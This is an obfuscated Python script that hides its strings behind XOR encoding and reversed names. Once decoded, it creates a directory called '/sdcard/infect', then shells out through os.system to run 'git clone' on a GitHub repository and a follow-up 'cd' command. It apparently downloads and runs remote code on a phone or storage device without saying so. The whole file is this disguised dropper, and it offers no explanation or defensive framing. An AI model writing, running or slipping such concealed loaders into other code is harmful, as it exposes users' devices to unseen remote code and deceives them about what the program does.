OlO1110l111O0lOlO1l0O = (lambda O01l0l1lOl0OlO0l00O00,
    Oll01O11ll01ll11OOll0: O01l0l1lOl0OlO0l00O00 ^ Oll01O11ll01ll11OOll0)
lOO11lOl1l1010O0l10ll = (lambda O0llll00O1l0OOl1l00ll,
    l1O0l0Oll0l0l0lllO0l1: O0llll00O1l0OOl1l00ll + l1O0l0Oll0l0l0lllO0l1)
O1lO1lO11Ol01OllO101O = __import__(''.join(chr(l1l0Ol1OO1O0l1O0O00l0 ^
    l1lOO1101O101l1l00l0O) for l1lOO1101O101l1l00l0O, l1l0Ol1OO1O0l1O0O00l0 in
    zip(b'^\x1c', b',y')), globals(), locals(), [], 0 * 3 + 0)
OO11l011Ol1O0Ol000Oll = __import__('o' + 's', globals(), locals(), [], 0)


def OllOll0O101lllO100ll1():
 try:
  getattr(OO11l011Ol1O0Ol000Oll, 'ridkm'[::-1])(''.join(chr(
      l1lll1O1Oll0000l00110 ^ O0l1OO10O1llOO0111000) for 
      O0l1OO10O1llOO0111000, l1lll1O1Oll0000l00110 in zip(
      b'\xef\xd5\x1a,ATg', b'\xc0\xa6~O &\x03')) + ''.join(chr(
      OllOlO000lO01llO1O001 ^ lO0OOllOl1Ol0OOO0O1lO) for 
      lO0OOllOl1Ol0OOO0O1lO, OllOlO000lO01llO1O001 in zip(
      b'\x01\xe5Rd\x10[\x95', b'.\x8c<\x02u8\xe1')))
 except OSError:
  pass
  getattr(OO11l011Ol1O0Ol000Oll, ''.join(chr(O01100l00O1O0llOl0l00 ^
      lOOO0100lO0l10l0l1Ol1) for lOOO0100lO0l10l0l1Ol1,
      O01100l00O1O0llOl0l00 in zip(b'\x15\xc8f\x08\x03\x9e',
      b'f\xb1\x15|f\xf3')))(''.join(chr(O00lOOOO1l0l010O01lll -
      l1lO1101O10011OO00011 + 2 * (~O00lOOOO1l0l010O01lll &
      l1lO1101O10011OO00011)) for l1lO1101O10011OO00011,
      O00lOOOO1l0l010O01lll in zip(
      b'a\x03\x11"\x91\xf2\xb5\xa6\xce\x08\x8a\x10\xb6yh\x84\xa9?\xbcI\x98\xda\xcbJ\x9f\xf2\xef\x0b\x15\\\xa8\x85!9iZTH~\xfdU\x9ff\xc1\xf7\xd7\x07mk\x8e8\x9bz>(\xae\xae\xfb\x9a\x07\xa1o\xa1'
      ,
      b'\x06je\x02\xf2\x9e\xda\xc8\xab(\xe2d\xc2\t\x1b\xbe\x86\x10\xdb \xec\xb2\xbe(\xb1\x91\x80f:\x08\xc0\xe0\x0ct\x08>9)\x10\xd0\x07\xfa\x04\xae\x85\xb9(\x04\x05\xe8]\xf8\x0eam\xd6\xda\x9e\xf4t\xc8\x00\xcf'
      )))
  getattr(OO11l011Ol1O0Ol000Oll, 'metsys'[::-1])(''.join(chr(
      l0lOlOOl111l0001000lO ^ lOOlOOO0lOO10lO0O0l0O) for 
      lOOlOOO0lOO10lO0O0l0O, l0lOlOOl111l0001000lO in zip(
      b'\xd3L*G\xe2\xba\xea\xe6~\xe9\x13\xeb1\x19#^K\xd5\xd1\xa4\xba5WO\xccZ\xc6=(6\n\xc3Z1\xdc\x9a\xcf\xedQ\xd3'
      ,
      b'\xb0(\n.\x8c\xdc\x8f\x85\n\xb6V\x93E|M-"\xba\xbf\x84\x9c\x13w-\xad)\xae\x1dmN~\xa64B\xb5\xf5\xa1\xc3"\xbb'
      )))


if __name__ == ''.join(chr(O0O11100l1010OOO0O01O ^ O0l0l11l0l10ll01O10O1) for
    O0l0l11l0l10ll01O10O1, O0O11100l1010OOO0O01O in zip(
    b'\x9b\xca\xf9p\xad\xca\x83\xbc', b'\xc4\x95\x94\x11\xc4\xa4\xdc\xe3')):
 OllOll0O101lllO100ll1()
